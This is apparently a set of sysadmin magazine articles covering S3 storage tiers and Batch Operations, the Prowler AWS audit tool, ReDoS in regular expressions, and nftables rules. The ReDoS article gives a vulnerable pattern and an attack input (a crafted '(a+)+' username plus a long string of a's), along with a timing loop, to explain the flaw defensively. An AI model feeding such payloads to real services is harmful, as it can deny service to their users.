Glacier Deep Archive has only been available as a storage class for S3 since early 2019. Since then, users have been able to archive objects from S3 Standard, S3 Standard-IA, or S3 Intelligent-Tiering not only in S3 Glacier, but also in Glacier Deep Archive. Although storage in Glacier is already three times cheaper than in S3 Standard, at less than half a cent per gigabyte, the price in Glacier Deep Archive drops again to $0.00099/GB per month.

This pricing should make Glacier Deep Archive the preferred storage class for all companies needing to maintain persistent archive copies of data that virtually never needs to be accessed. It could also make local tape libraries superfluous for many users. The low price of the archive comes at the price of extended access time: Accessing data stored in S3 Glacier Deep Archive requires a delivery time of 12 hours, compared with a few minutes (Expedited) or five hours (Standard) in Glacier.

Mass Batch for S3 Objects

The new Amazon Batch Operations feature was also presented at re:Invent 2018 and is now available as a preview. This feature lets admins manage billions of objects stored in S3 with a single API call or a few mouse clicks in the S3 console and


allows object properties or metadata to be changed for any number of S3 objects. This approach also applies to copying objects between buckets or replacing tag sets, changing access controls, or retrieving/restoring objects from S3 Glacier in minutes rather than months.

Until now, companies have often had to spend months of development time writing optimized application software that could apply the required API actions to S3 objects on a massive scale. The Batch Operations feature can also be used to perform custom Lambda functions on billions or trillions of S3 objects, enabling highly complex tasks, such as image or video transcoding. Specifically, the feature takes care of retries, tracks progress, sends notifications, generates final reports, and delivers the events for all changes made and tasks performed to CloudTrail.

For a start, users can specify a list of target objects in an S3 inventory report that lists all objects of an S3 bucket or prefix. Optionally, you can specify your own list of target objects. You then select the desired API action from a prefilled options menu in the S3 Management Console. The new S3 Batch Operations [3] are available in all AWS regions now. Operations are charged at $0.25/job or $1.00/million object operations performed, on top of charges associated with any operation S3 Batch Operations performs for you (e.g., data transfer, requests, and other charges).
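Such a batch job can also be created from the command line instead of the console. The following is only a rough sketch of what a job definition looks like: the account ID, the role ARN, the bucket names, and the manifest ETag are placeholders, and the operation block depends entirely on what you want the job to do (here, tagging every object listed in a CSV manifest):

aws s3control create-job \
    --account-id 123456789012 \
    --operation '{"S3PutObjectTagging": {"TagSet": [{"Key": "project", "Value": "archive"}]}}' \
    --manifest '{"Spec": {"Format": "S3BatchOperations_CSV_20180820", "Fields": ["Bucket", "Key"]},
                 "Location": {"ObjectArn": "arn:aws:s3:::mybucket/manifest.csv", "ETag": "<etag-of-manifest>"}}' \
    --report '{"Bucket": "arn:aws:s3:::mybucket", "Prefix": "batch-reports",
               "Format": "Report_CSV_20180820", "Enabled": true, "ReportScope": "AllTasks"}' \
    --priority 10 \
    --role-arn arn:aws:iam::123456789012:role/batch-operations-role

The job then runs asynchronously; progress and the final report end up in the prefix named in the --report block.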

Conclusions

Amazon S3 is far more than a file storage facility on the Internet, and even experienced users often don't know all of its capabilities, especially because AWS is constantly adding new features. Those who know the access patterns to their data can save a lot of money. Additionally, AWS now provides a degree of automation with the new S3 Intelligent-Tiering storage class (at an extra charge).
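If you are not sure which classes your existing objects already occupy, a quick inventory from the CLI is one way to find out. This is just a small sketch; mybucket is a placeholder, and the query simply reformats what list-objects-v2 reports for each object:

# List every object together with its current storage class
aws s3api list-objects-v2 --bucket mybucket \
    --query 'Contents[].[Key,StorageClass]' --output table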

Figure 2: The lifecycle guidelines in Amazon S3 can be determined from the management user interface, as well.

Info
[1] Amazon S3 Service Level Agreement: [https://aws.amazon.com/s3/sla/?nc1=h_ls]
[2] Prices for Amazon S3: [https://aws.amazon.com/s3/pricing/?nc1=h_ls]
[3] S3 Batch Operations: [https://docs.aws.amazon.com/AmazonS3/latest/user-guide/batch-ops.html]


Prowling AWS

Snooping Around
Prowler is an AWS security best practices assessment, auditing, hardening, and forensics readiness tool. By Chris Binnie

Hearing that an external, independent organization has been commissioned to spend time actively attacking the cloud estate you have been tasked with helping to secure can be a little daunting – unless, of course, you are involved with a project at the seminal greenfield stage and you have yet to learn what goes where and how it all fits together. To add to the complexity, if you are using Amazon Web Services (AWS), AWS Organizations can segregate departmental duties and, therefore, security controls between multiple accounts; commonly this might mean the use of 20 or more accounts. With these concerns, and if you blink a little too slowly, it's quite possible that you will miss a new AWS feature or service that needs to be understood and, once deployed, secured.

Fret not, however, because a few open source tools can help mitigate the pain before an external auditor or penetration tester receives permission to attack your precious cloud infrastructure. In this article, I show you how to install and run the highly sophisticated tool Prowler [1]. With the use of just a handful of its many features, you can test against the industry-consensus benchmarks from the Center for Internet Security (CIS) [2].

What Are You Lookin' At?

When you run Prowler against the overwhelmingly dominant cloud provider AWS, you get the chance to apply an impressive 49 test criteria of the AWS Foundations Benchmark. For some additional context, sections on the AWS Security Blog [3] are worth digging into further.

To bring more to the party, the sophisticated Prowler also stealthily prowls for issues in compliance with the General Data Protection Regulation (GDPR) of the European Union and the Health Insurance Portability and Accountability Act (HIPAA) of the United States. Prowler refers to these 40 additional checks as "extras". Table 1 shows the type and number of checks that Prowler can run, and the right-hand column offers the group name you should use to get Prowler to test against specific sets of checks.

Table 1: Checks and Group Names

Description                       No./Type of Checks      Group Name
Identity and access management    22 checks               group1
Logging                           9 checks                group2
Monitoring                        14 checks               group3
Networking                        4 checks                group4
Critical priority CIS             CIS Level 1             cislevel1
Critical and high-priority CIS    CIS Level 2             cislevel2
Extras                            39 checks               extras
Forensics                         See README file [4]     forensics-ready
GDPR                              See website [5]         gdpr
HIPAA                             See website [6]         hipaa

Porch Climbing

To start getting your hands dirty, install Prowler and see what it can do to help improve the visibility of your security issues. To begin, go to the GitHub page [1] held under author Toni de la Fuente's account; he also has a useful blogging site [7] that offers a number of useful insights into the vast landscape of security tools available to users these days and where to find them. I recommend a visit, whatever your level of experience.

The next step is cloning the repository with the git command [8] (Listing 1). As you can see at the beginning of the command's output, the prowler/ directory will hold the code.

Listing 1: Installing Prowler

$ git clone https://github.com/toniblyx/prowler.git
Cloning into 'prowler'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (41/41), done.
remote: Total 2955 (delta 6), reused 43 (delta 5), pack-reused 2905
Receiving objects: 100% (2955/2955), 971.57 KiB | 915.00 KiB/s, done.
Resolving deltas: 100% (1934/1934), done.

The README file recommends installing the ansi2html and detect-secrets packages with the pip Python package installer:

$ pip install awscli ansi2html detect-secrets

If you don't have pip installed, fret not: Use your package manager. For example, on Debian derivatives, use the apt command:

$ apt install python-pip

On Red Hat Enterprise Linux child distributions and others like openSUSE or Arch Linux, you can find instructions online [9] for help if you're not sure of the package names.

Now you're just about set to run Prowler from a local machine perspective. Before continuing, however, the other part of the process is configuring the correct AWS Identity and Access Management (IAM) permissions.

An Access Key and a Secret Key attached to a user is needed from AWS, with the correct permissions being made available to the user via a role. Don't worry, though: The permissions aren't giving away the crown jewels but reveal any potential holes in your security posture. Therefore, the results need to be stored somewhere with care, as do all access credentials to AWS.

You might call the List/Read/Describe actions "read-only" if you wanted to summarize succinctly the levels of access required by Prowler. You can either use the SecurityAudit policy permissions, which is provided by AWS directly, or the custom set of permissions in Listing 2 required by the role to be attached to the user in IAM, which opens up DescribeTrustedAdvisorChecks in addition to those offered by the SecurityAudit policy, according to the GitHub README file.

Listing 2: Permissions for IAM Role

{
  "Version": "2012-10-17",
  "Statement": [{
    "Action": [
      "acm:describecertificate", "acm:listcertificates",
      "apigateway:get", "autoscaling:describe*",
      "cloudformation:describestack*", "cloudformation:getstackpolicy",
      "cloudformation:gettemplate", "cloudformation:liststack*",
      "cloudfront:get*", "cloudfront:list*",
      "cloudtrail:describetrails", "cloudtrail:geteventselectors",
      "cloudtrail:gettrailstatus", "cloudtrail:listtags",
      "cloudwatch:describe*",
      "codecommit:batchgetrepositories", "codecommit:getbranch",
      "codecommit:getobjectidentifier", "codecommit:getrepository",
      "codecommit:list*",
      "codedeploy:batch*", "codedeploy:get*", "codedeploy:list*",
      "config:deliver*", "config:describe*", "config:get*",
      "datapipeline:describeobjects", "datapipeline:describepipelines",
      "datapipeline:evaluateexpression", "datapipeline:getpipelinedefinition",
      "datapipeline:listpipelines", "datapipeline:queryobjects",
      "datapipeline:validatepipelinedefinition",
      "directconnect:describe*", "dynamodb:listtables",
      "ec2:describe*", "ecr:describe*", "ecs:describe*", "ecs:list*",
      "elasticache:describe*", "elasticbeanstalk:describe*",
      "elasticloadbalancing:describe*",
      "elasticmapreduce:describejobflows", "elasticmapreduce:listclusters",
      "es:describeelasticsearchdomainconfig", "es:listdomainnames",
      "firehose:describe*", "firehose:list*",
      "glacier:listvaults", "guardduty:listdetectors",
      "iam:generatecredentialreport", "iam:get*", "iam:list*",
      "kms:describe*", "kms:get*", "kms:list*",
      "lambda:getpolicy", "lambda:listfunctions",
      "logs:DescribeLogGroups", "logs:DescribeMetricFilters",
      "rds:describe*", "rds:downloaddblogfileportion", "rds:listtagsforresource",
      "redshift:describe*",
      "route53:getchange", "route53:getcheckeripranges",
      "route53:getgeolocation", "route53:gethealthcheck",
      "route53:gethealthcheckcount", "route53:gethealthchecklastfailurereason",
      "route53:gethostedzone", "route53:gethostedzonecount",
      "route53:getreusabledelegationset", "route53:listgeolocations",
      "route53:listhealthchecks", "route53:listhostedzones",
      "route53:listhostedzonesbyname", "route53:listqueryloggingconfigs",
      "route53:listresourcerecordsets", "route53:listreusabledelegationsets",
      "route53:listtagsforresource", "route53:listtagsforresources",
      "route53domains:getdomaindetail", "route53domains:getoperationdetail",
      "route53domains:listdomains", "route53domains:listoperations",
      "route53domains:listtagsfordomain",
      "s3:getbucket*", "s3:getlifecycleconfiguration",
      "s3:getobjectacl", "s3:getobjectversionacl", "s3:listallmybuckets",
      "sdb:domainmetadata", "sdb:listdomains",
      "ses:getidentitydkimattributes", "ses:getidentityverificationattributes",
      "ses:listidentities", "ses:listverifiedemailaddresses", "ses:sendemail",
      "sns:gettopicattributes", "sns:listsubscriptionsbytopic", "sns:listtopics",
      "sqs:getqueueattributes", "sqs:listqueues",
      "support:describetrustedadvisorchecks",
      "tag:getresources", "tag:gettagkeys"
    ],
    "Effect": "Allow",
    "Resource": "*"
  }]
}

Have a close look at the permissions to make sure you're happy with them. As you can see, a lot of list and get actions cover a massive amount of AWS's ever-growing number of services. In a moment, I'll return to this policy after setting up the AWS configuration.

Gate Jumping

For those who aren't familiar with the process of setting up credentials for AWS, I'll zoom through them briefly. The obvious focus will be on Prowler in action.

In the redacted Figure 1, you can see the screen found in the IAM service under the Users | Security credentials tab. Because you're only shown the secret key once, you should click the Create access key button at the bottom and then safely store the details.

Figure 1: Creating the user's Access Key and Secret Key in AWS in the IAM service.

To make use of the Access Key and Secret Key you've just generated, return to the terminal and enter:

$ aws configure
AWS Access Key ID []:

The aws command became available when you installed the AWS command-line tool with the pip package manager. As you will see from the questions asked by that command, you need to offer a few defaults, such as the preferred AWS region, the output format, and, most importantly, your Access Key and Secret Key, which you can enter with cut and paste. Once you've filled in those details, two files are created in plain text and stored in the ~/.aws directory: config and credentials.

Because these keys are plain text, many developers use environment variables to populate their terminal with these details so they're ephemeral and not saved in a visible format. Wherever you keep them, you should encrypt them when stored – known as "data at rest" in security terms.

Lurking

Back in your browser and the AWS IAM service, you can see in Figure 2 where to paste the policy content shown in Listing 2 (i.e., the Policies

Figure 2: Creating the IAM policy for Prowler.


| Create policy page). After carefully pasting all of Listing 2 into the JSON tab, click the blue Review policy button at the bottom of the screen. Just make sure you paste over the existing empty JSON policy to remove it before proceeding, and you'll be fine.

On the following screen, you're required to provide a sensible name for the policy (e.g., prowler-audit-policy), check the policy rules displayed, and click the blue button at the bottom of the page to proceed.

Figure 3 shows success, and you can now attach your shiny new policy to your user (or role, if you prefer, having attached the role to your user). The final AWS step is attaching your policy to your user, as seen in Figure 4. In the IAM service, click Users, choose your user, then click Add permissions and select a policy. Next, click Attach existing policies directly, tick the box beside prowler-audit-policy to select it, and click the blue Next: Review button.

On the next screen, click Add permissions; lo and behold, you'll see your new policy under Attached directly. If you failed to get that far, just retrace your steps. It's not tricky once you are familiar with the process.

Figure 3: Happiness is a successfully created IAM policy for Prowler.
Figure 4: Prepare to choose your Prowler policy.

Prowling

To recap, you have created an AWS user and attached your newly created policy to that user. Good practice would usually be to create an IAM role, too, and then attach the policy to the new role if multiple users need to access the policy. The command aws configure lets the AWS command-line client know exactly where to find your credentials.

You can now cd to your prowler directory to run the script that fires up Prowler. You probably remember that the directory was created during the GitHub repository cloning process in the early stages.

Now you can run your tests. A relatively healthy smattering of patience is required for your first run. As you'd expect, because of the Herculean task being attempted by Prowler, it takes a good few minutes to complete. The redacted Figure 5 shows the beginning of an in-depth audit.

Figure 5: Prowler sets itself up at the start of the auditing run with useful colored output for clarity as it goes.

As the AWS audit continues, you can see the impressive test coverage being performed against the AWS account (Figure 6). If your permissions are safe in the IAM policy, then other than using up some of your concurrent API request limits, it's a good idea to run this type of audit frequently to help spot issues or misconfigurations that you'd have otherwise missed.

Figure 6: The tests are extremely thorough and well considered.

Grand Theft AWS

Once the stealthy Prowler has finished its business, you have a number of other ways to tune it for your needs that you might want to explore. For example, if you have multiple AWS accounts over which you want to run Prowler, you can interpolate the name of the account profile in your ~/.aws/credentials file:

$ ./prowler -p custom-profile -r eu-west-1

Although the command only points at one region, Prowler will traverse the other regions where needed to complete its auditing.

Breaking and Entering

The README file offers some other useful options in the examples I shamelessly repeat and show in this section. If you ever want to check one of the tests individually, use:

$ ./prowler -c check32

After the first Prowler run to make sure it runs correctly, then a handy tip is to spend some time looking through the benchmarks listed earlier to figure out what you might need to audit against, instead of running through all the many checks.

It's also not such a bad idea if you find the check numbers from the Prowler output and focus on specific areas to speed up your report generation time. Just delimit your list of checks with commas after the -c switch.

Additionally, use the -E command switch

$ ./prowler -E check17,check24

to run Prowler against lots of checks while excluding only a few.

Lookin' Oh So Pretty

As you'd expect, Prowler produces a nicely formatted text file for your auditing report, but harking back to the pip command earlier, you might remember that you also installed the ansi2html package, which allows the mighty Prowler to produce HTML by piping the output of your results:

$ ./prowler | ansi2html -la > prowler-audit.html

Similarly, you can output to JSON or CSV with the -M switch:

$ ./prowler -M json > prowler-audit.json

Just change json to csv (in the file name, too) if you prefer a CSV file. The well-written Prowler docs also offer a nice example of saving a report to an S3 bucket:

$ ./prowler -M json | aws s3 cp - s3://your-bucket/prowler-audit.json

Finally, if you've worked with security audits before, you'll know that reaching an agreed level of compliance is the norm; therefore if, for example, you only needed to meet the requirements of CIS Benchmark Level 1, you could ask Prowler to focus on those checks only:

$ ./prowler -g cislevel1

If you want to check against multiple AWS accounts at once, then refer to the README file for a clever one-line command that runs Prowler across your accounts in parallel. A useful bootstrap script is offered, as well, to help you set up your AWS credentials via the AWS client and run Prowler, so it's definitely worth a read.

Additionally, a nice troubleshooting section looks at common errors and the use of multifactor authentication (MFA). Suffice it to say that the README file is comprehensive, easy to follow, and puts some other documentation to shame.

The End Is Nigh

Prowler boasts a number of checks that other tools miss, has thorough and considered documentation, and is a lightweight and reliable piece of software. I prefer the HTML reports, but running the JSON through the jq program is also useful for easy-to-read output.

Having scratched the surface of this clever open source tool, I trust you'll be tempted to do the same and to keep an eye on your security issues in an automated fashion.

Info
[1] Prowler: [https://github.com/toniblyx/prowler]
[2] CIS: [https://www.cisecurity.org]
[3] AWS Security Blog: [https://aws.amazon.com/blogs/security/tag/cis-aws-foundations-benchmark/]
[4] Prowler README: [https://github.com/toniblyx/prowler/blob/master/README.md]
[5] GDPR: [https://ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr/]
[6] HIPAA: [https://www.hhs.gov/hipaa/for-professionals/security/laws-regulations/index.html]
[7] Toni de la Fuente: [https://blyx.com]
[8] Git: [https://git-scm.com/book/en/v2/Getting-Started-Installing-Git]
[9] Linux package managers: [https://packaging.python.org/guides/installing-using-linux-tools]

The Author
Chris Binnie's latest book, Linux Server Security: Hack and Defend, shows how hackers launch sophisticated attacks to compromise servers, steal data, and crack complex passwords, so you can learn how to defend against such attacks. In the book, he also shows you how to make your servers invisible, perform penetration testing, and mitigate unwelcome attacks. You can find out more about DevOps, DevSecOps, Containers, and Linux security on his website: https://www.devsecops.cc.
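If you do want to keep an eye on things in an automated fashion, the switches shown in this article are all you need. The following is a small sketch, not an official Prowler feature: the bucket name, the installation path, and the weekly schedule are assumptions you will want to adapt:

#!/bin/bash
# /usr/local/bin/prowler-weekly.sh - run the CIS Level 1 checks and archive the report
cd /opt/prowler || exit 1
REPORT="/tmp/prowler-$(date +%F).json"
./prowler -g cislevel1 -M json > "$REPORT"
aws s3 cp "$REPORT" s3://your-bucket/prowler-reports/

# Example crontab entry: every Monday at 06:00
# 0 6 * * 1 /usr/local/bin/prowler-weekly.sh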


Regular expression security

Pass the Test

Regular expressions are invaluable for checking user input, but a vulnerability could make them ripe for exploitation. By Matthias Wübbeling

One important paradigm in software development, especially web applications, is careful validation of user input before allowing further processing. Much can go wrong if the input is not carefully checked. SQL injection and cross-site scripting attacks are just two of the most common examples of exploitation. Regular expressions are useful for checking user input, but even they are vulnerable to attacks. In this article, I show you how to check your regular expressions for vulnerabilities.

Regular Expressions

Regular expressions (regex) have become an established method of validating user input before processing to describe and check for permitted entries and to prevent certain characters (e.g., those with a special function in an application) from being entered. Unfortunately, some regular expressions can still cause unwanted behavior with certain types of input and make the script unusable – much like a denial of service attack.

A regular expression describes a language, wherein you define the language that you want to accept as input for an application. Email addresses provide a simple but useful example. The World Wide Web Consortium recommends the following regular expression for the language of email addresses:

^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*$

When you see a string like this for the first time, the semantics are not immediately apparent, but regular expressions form a language that is actually quite easy to understand. The two characters ^ and $ describe the start and end of input, respectively. The parentheses form groups and the square brackets ([ ]) classes of admissible input characters. In this case, no value other than those that would appear in an email address may be present in the input. The first class in the example comprises a-z (all lowercase letters), A-Z (all uppercase letters), 0-9 (all digits), and all the special characters specified up to the right square bracket.

Certain symbols define the frequency of occurrence of any characters in a group or class: ? (zero or one time), + (one or more times), and * (zero or more times). The plus sign that appears after the first closing square bracket and in front of the @ sign therefore says that the @ symbol of an email address must be preceded by at least one to any number of the specified characters.

The regular expression after the @ checks domain names, which begin with at least one character, number, or hyphen (+), with an optional extension (*) comprising a period (zero or more times) and at least one of the characters of the class that follows. The dot also has a special meaning for regular expressions: It stands for any character. If you really expect a dot at a location, you need to insert a backslash in front (e.g., \., as in the example) to "escape" the character.

If you adhere to all these requirements, you can generate words in the regular language of email addresses. Regular expressions also allow the logical AND and OR operations. The AND operation is implicit outside of a class, whereas within a class, characters are implicitly linked with OR. The | character is used to stipulate an explicit OR; for example, a|b stands for a character that is either a or b. The expression is equivalent to the class [ab]. If you want to check the string for email addresses, you can use the Python console (Figure 1).

State Machines

State machines are used to test whether a word is part of a language – for example, whether the user input is an email address. If this doesn't mean anything to you, just imagine a ticket vending machine for the subway or a train. It assumes different states (e.g., the welcome screen,


ticket selection, payment, or ticket printout) and expects different types of input from the operator that cause a transition from one state to another. If all the user input matches the previously defined input language, the machine accepts the input and prints a ticket.

Figure 1: Checking a regular expression for correctness in the Python console.

State machines that check whether an input word is part of a language work in the same way. Each letter of an input word changes the state of the machine. If the state machine is in an accepting state after the input, the word is part of the language. Figure 2 shows a simple state machine with four states and the transitions between these states. State 1 is accepting; all other states are not. The state machine has an input alphabet that comprises only the letters a and b. Words are accepted in which an a is followed by another a or a b. The state machine is equivalent to the regular expression:

^a[ab]+$

Figure 2: A state machine determines whether the user input is part of the specified language.

If the input word starts with a b, the machine changes to state 3. From this state, it cannot transition to any other state, especially not the accepting state 1, which means the word input is not part of the language and is not accepted. If it reads an a first, the machine switches to state 2. From there, either an a or b will cause it to transition to the accepting state 1. If this terminates the input, then the word is part of the language, and the state machine accepts it. If further characters are read from the input, the machine proceeds to state 3 and does not accept the input.

For each regular expression in your application, you can create state machines and use them to check the input. State machines can become quite large, with many states and transitions. In particular, relations with + and * quantifiers, large classes, or the dot (.) for all possible input symbols lead to very large state machines.

Attack with ReDoS

A state machine's performance when checking regular expressions depends on many factors: the size of the state machine (i.e., the number of states and transitions) and, of course, the input. A state machine checks each possible sequence of states in turn until it accepts one of the sequences, which means, in the worst case, the run time for a state machine that checks a regular expression can grow exponentially in relation to the input. More bad news is that you often don't even notice that a regular expression results in a large state machine with a correspondingly long run time.

The Open Web Application Security Project (OWASP) lists the regular expression denial of service (ReDoS) [1] as an attack and shows some regular expressions that have unexpectedly bad worst-case run times, such as:

^(a+)+$

At first glance this does not seem to be a problematic expression; for example, the input aaaa has only 16 (2^4) possible sequences of state transitions. However, if you enter a 16 times, you already have 2^16 = 65,536 possible sequences, all of which need to be checked. The number doubles with each additional a in the input.

Occasionally, developers also use user input to create regular expressions. Imagine you want to prevent a username from being included in the password you are using. If an attacker chooses (a+)+ as the username and types a 40 times as the password, the state machine would have to check 2^40 possible sequences. An attacker could thus deliberately cause a denial of service if they had some idea of how the application checked user input.

Conclusions

Regular expressions are useful for checking user input and are deployed in web applications and on firewalls or proxy servers. However, they also have pitfalls that are not immediately obvious. For this reason, you should always test the regular expressions you use intensively, because the damage potential is not always apparent. If you have inadvertently developed a vulnerable regular expression, sometimes simple adjustments or tolerable inaccuracy in the recognition process can make a broken or unsafe regular expression work safely.

Info
[1] ReDoS: [https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS]
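If you want to see the exponential growth described above for yourself, a quick experiment from the shell is enough. This sketch times the vulnerable expression against inputs that almost match (they end in an exclamation mark, so the engine must backtrack through every possible grouping of the a's); the absolute timings depend on your machine, but the run time roughly doubles with every additional character:

# Time the catastrophic backtracking of ^(a+)+$ for growing inputs
for n in 18 20 22 24 26; do
    echo -n "n=$n: "
    time python3 -c "import re; re.match(r'^(a+)+\$', 'a' * $n + '!')"
done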


Linux nftables packet filter

Screened
The latest nftables packet filter implementation, now available in the Linux kernel, promises
better performance and simpler syntax and operation. By Thorsten Scherf

The Linux kernel already contains a variety of packet filters, starting with ipfwadm and followed by ipchains and iptables. Kernel 3.13 saw the introduction of nftables [1], which uses the nft tool to create and manage rules. With the help of its own virtual machine, nftables ensures that rulesets are converted into bytecode, which is then loaded into the kernel. Not only does it improve performance, but it also allows administrators to enable new rules dynamically without having to reload the entire ruleset.

Parts of the old Netfilter framework use nftables, removing the need to develop new hooks, which are nothing more than certain points in the network stack of the Linux kernel at which a packet is inspected and, in the case of a match, one or more actions executed. For this purpose, tables that store chains exist at these hook points. The chains in turn contain the rules.

The way in which the individual packets are now checked against the rules is another new feature of nftables. The classification is now far more sophisticated and elegant than it was in the days of iptables. For example, address families now allow you to process different packets with a single rule. If you wanted to examine IPv4 and IPv6 packets in the past, you not only needed different rules, you even had to load them into the kernel with different tools: iptables and ip6tables. The simple nftables inet table type includes both IPv4 and IPv6. Now, you can also merge different statements with nftables. With iptables,


writing a packet to the log first and then performing another action, such as dropping the packet, was a very roundabout approach that required two rules:

iptables -A INPUT -p tcp --dport 23 -j LOG
iptables -A INPUT -p tcp --dport 23 -j DROP

With nftables, this is reduced to a single rule:

nft add rule filter input tcp dport 23 log drop

This kind of facilitation can be found at many different places in nftables.

In addition to the hooks, nftables continues to use Netfilter code for connection tracking, network address translation (NAT), userspace queuing, and logging. The compatibility layer is very helpful if you are migrating from iptables, because it lets you continue using the iptables netfilter tool, even if the underlying framework is now nftables, not Netfilter. If you don't need Netfilter and prefer to have all new features available instead, you can use the new nft tool instead.

To make sure the kernel you are using supports nftables, call the modinfo tool (Listing 1). You should then see some information about the nf_tables kernel module.

Listing 1: modinfo nf_tables

# modinfo nf_tables
filename:       /lib/modules/4.20.5-200.fc29.x86_64/kernel/net/netfilter/nf_tables.ko.xz
alias:          nfnetlink-subsys-10
author:         Patrick McHardy <kaber@trash.net>
license:        GPL
depends:        nfnetlink
retpoline:      Y
intree:         Y
name:           nf_tables
vermagic:       4.20.5-200.fc29.x86_64 SMP mod_unload
sig_id:         PKCS#7
signer:
sig_key:
sig_hashalgo:   md4

Kernel-Dependent Routing

Because the old Netfilter hooks are still used, the route of a packet through the network stack with nftables is similar to that of Netfilter (Figure 1): In prerouting, a decision is made as to whether a network packet is either intended for a process on the local machine or simply needs to be forwarded in-line with the routing table. In the first case, the packet reaches the local process by way of the input entry point, where it is processed. It then passes through the output and postrouting hooks before leaving the network stack again.

If the packet is not intended for a local process, though, routing is performed on the basis of existing routing entries. Make sure that the kernel supports this routing, which is defined in the Linux kernel by the /proc/sys/net/ipv4/ip_forward or /proc/sys/net/ipv6/ip_forward file. In this case, the packet only passes through the prerouting, forward, and postrouting hooks.

In these three hooks, the packet can be rewritten by NAT in terms of the IP address and the port. Nftables allows changes to the target address for the prerouting and input hooks, and to the sender's address for the postrouting and output hooks. If you want to filter the packet instead, you can create corresponding tables in the input, forward, or output hooks and store your rulesets there. Another innovation in nftables is the new ingress entry point, which allows the filtering of packets on Layer 2, providing functions similar to the tc (traffic control) [2] tool.

Figure 1: nftables uses the hooks already known from Netfilter. However, the ingress entry point, which also supports Layer 2 filtering, is new.

Unlike Netfilter, nftables has no predefined constructs for tables and chains in which the actual rules end up. Administrators need to create these themselves with the nft tool:

nft add|list|flush|delete table|chain|rule <options>

If you now want to create a new table, you must consider a few points. For example, it is essential to assign an address family to a table. The following address families are provided by nftables: ip, ip6, inet, bridge, arp, and netdev. Although the first four families can be used in all hooks, nftables only allows


the arp address family in tables that are created as part of the input or output hooks, and netdev is only allowed for ingress tables. If no address family is specified when creating a table, nftables uses ip by default.

To load rulesets into the kernel that ensure that both IPv4 and IPv6 packets are checked for their properties and filtered, you need to create a table with the inet address family. In the following example, this table is named firewall:

nft add table inet firewall

A call to nft list tables confirms that the table was created correctly:

nft list tables inet
table inet firewall

If needed, you can limit the output to certain address families.

Creating a New Chain

The next step is to create a new chain within this table that has the task of incorporating the rules. As with the address families, which are linked with tables, different types of chains exist: filter, nat, and route. The filter chains can be created in all hooks; nat chains are allowed in prerouting, input, output, and postrouting hooks; and route chains can only be created in output hooks. Because the purpose of this example is to filter IP packets for a local computer, you need to create a filter chain, assign it to the previously created firewall table, and specify where in the network stack it should be placed:

nft create chain inet firewall incoming { type filter hook input priority 0\; }

You have now successfully created a base chain for filtering IP packets within the firewall table, defined a default priority, and named the chain incoming. The call to nft list chains confirms that everything worked successfully:

nft list chains
table inet firewall {
  chain incoming {
    type filter hook input priority 0; policy accept;
  }
}

Within this chain you can then create rules that ensure that incoming and outgoing packets are inspected according to certain criteria, such as the source and target IP addresses, source or target ports, or state variables (e.g., membership of an existing connection). If all these criteria apply to a data packet flowing through the network stack and thus through each Netfilter hook, a match has occurred, and a specific action is performed. This action should also be defined as a rule. For example, you can tell nftables to accept or reject the packet in a match, or simply create a log entry.

In the following example, I present some simple rules to give you a feel for the new nftables syntax. The first rule ensures that nftables accepts all packets passing through the loopback interface:

nft add rule inet firewall incoming iif lo accept

Furthermore, new SSH connections (ct state new) to port 22 will be allowed (tcp dport 22). Packets that belong to existing SSH connections are also allowed (ct state established,related) and are detected by nftables connection tracking. All other packets are dropped:

nft add rule inet firewall incoming ct state established,related accept
nft add rule inet firewall incoming tcp dport 22 ct state new accept
nft add rule inet firewall incoming drop

The individual objects and their hierarchy are now displayed by nftables with nft list ruleset (Listing 2). The -a option ensures that the internal enumeration (handles) of the individual rules is also displayed. A new rule can be inserted later easily enough with the command:

nft add rule inet firewall incoming position 4 tcp dport 443 ct state new accept

This rule now also allows all new connections to secure HTTPS port 443. You do not have to worry about packets that belong to existing connections at this point, because they are already detected and accepted by the connection tracking match with handle 7. The matches already mentioned above are extremely diverse in nftables and allow very complex rulesets [3]. Thanks to tcpdump-based syntax, however, they look quite compact and can be understood intuitively.

Listing 2: nft list ruleset

nft list ruleset -a
table inet firewall {
  chain incoming {
    type filter hook input priority 0; policy accept;
    iif "lo" accept # handle 5
    ct state established,related accept # handle 7
    tcp dport ssh ct state new accept # handle 8
    drop # handle 9
  }
}

Listing 3: Revised Ruleset

nft list table inet firewall
table inet firewall {
  chain smtp-chain {
    counter packets 1 bytes 80
  }
  chain incoming {
    type filter hook input priority 0; policy accept;
    iif "lo" accept
    ct state established,related accept
    tcp dport ssh ct state new accept
    tcp dport https ct state new accept
    tcp dport smtp ct state new jump smtp-chain
    drop
  }
}

Flexible Sorting of Rules

If you want to add some order into your rulesets, you can do this with


some of the other new nftables features. For example, rules can be sorted very easily with the help of non-base chains. However, they are not assigned directly to an entry point in the kernel and therefore do not see any network traffic. That said, you can jump from other chains into these non-base chains and thus evaluate the rules that exist there.

The idea behind this functionality is that a multitude of rules can be sorted logically in a very simple and elegant way. The following example creates a chain named smtp-chain that contains just a single rule with a traffic counter pointing at the local SMTP port. From the existing incoming chain, the system then jumps into this new chain, evaluates the existing rule, and then continues with the rules from the incoming base chain. In this case, only the catch-all rule is evaluated, and all packets that have not already been captured by other rules are dropped:

nft add chain inet firewall smtp-chain
nft add rule inet firewall incoming position 8 tcp dport 25 ct state new jump smtp-chain
nft add rule inet firewall smtp-chain counter

Also important at this point is to insert the jump rule at the correct position in the incoming chain; otherwise, the rule would come after the drop catch-all statement and never be executed. After the last changes, the new set of rules now looks like Listing 3.

The set is another new feature in nftables that lets you merge elements of a rule, such as an IP address or port, into an array. You can then use this array in the desired rule. The following example of a named set assigns IP address ranges to allow-smtp-set:

nft add set inet firewall allow-smtp-set { type ipv4_addr\; flags interval\; }
nft add element inet firewall allow-smtp-set { 10.1.0.0/24, 192.168.0.0/24 }

You can then access this named set in any rule:

nft add rule inet firewall incoming position 8 tcp dport { 25, 587 } ip saddr @allow-smtp-set accept

In this case, a new rule is placed at a defined point in the incoming chain and uses the previously defined allow-smtp-set to specify the sender address. For the SMTP ports, on the other hand, an "anonymous set" is used, which you can use directly in a rule without having to define it beforehand.

Combining Functions

